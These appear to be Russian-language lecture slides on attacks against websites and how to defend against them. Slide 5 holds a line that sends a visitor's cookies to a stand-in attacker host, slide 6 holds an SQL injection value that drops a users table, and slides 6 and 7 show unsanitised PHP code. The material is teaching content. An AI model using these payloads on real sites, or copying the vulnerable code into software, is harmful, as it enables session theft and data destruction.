1. Уязвимость сайтов и обеспечение их безопасности

2. Цели атак на сайты Получение секретной информации (пароли и т.п.) Получение конфиденциальной информации Выведение сайтов из строя, удаление данных Замена содержимого сайтов, размещение рекламной информации

3. Предметы атак на сайты WWW-сервера: Операционная система HTTP-сервер Серверные расширения Веб-приложения WWW-клиенты: Операционная система (внедрение вирусов) Получение cookie, хранящихся на компьютере

4. Виды сетевых атак DoS-атаки и DDoS-атаки ( Distributed Denial of Service ) Фишинг (phishing) ip-спуфинг (spoofing) Троянский конь (Spyware) drive-by download (загрузка программ на сервер) Cross-Site Scripting (CSS) (HTML injection) SQL injection XSS (межсайтовый скриптинг) CSRF (Cross-site request forgery) Атака одного клика Без использования сетевых средств

5. HTML injection window.open("http://www.attacker.site/collec t.cgi?cookie="+document.cookie)

6. SQL injection $firstname = $_POST["firstname"]; mysql_query("SELECT * FROM users WHERE first_name='$firstname'"); Если firstname = "'; drop table users; #", то код удалит таблицу пользователей

7. XSS (межсайтовый скриптинг) $firstname = $_GET["firstname"]; echo "Your name: $firstname"; Если firstname = " … ", то скрипт будет выполнен Достаточно дать пользователям ссылку http://hacked.ru/any.php?firstname= …

8. CSRF Атака одного клика Заставить клиента выполнить нужный запрос

9. Защита от интернет-атак Защита на стороне сервера: Настройка прав на компьютере-сервере Настройка http-сервера Аккуратное программирование на стороне сервера Проверка входящих http-запросов Защита на клиенте: Общая антивирусная защита Проверка входящего http-трафика Настройки безопасности браузеров Разумные методы хранения паролей и конфиденциальных данных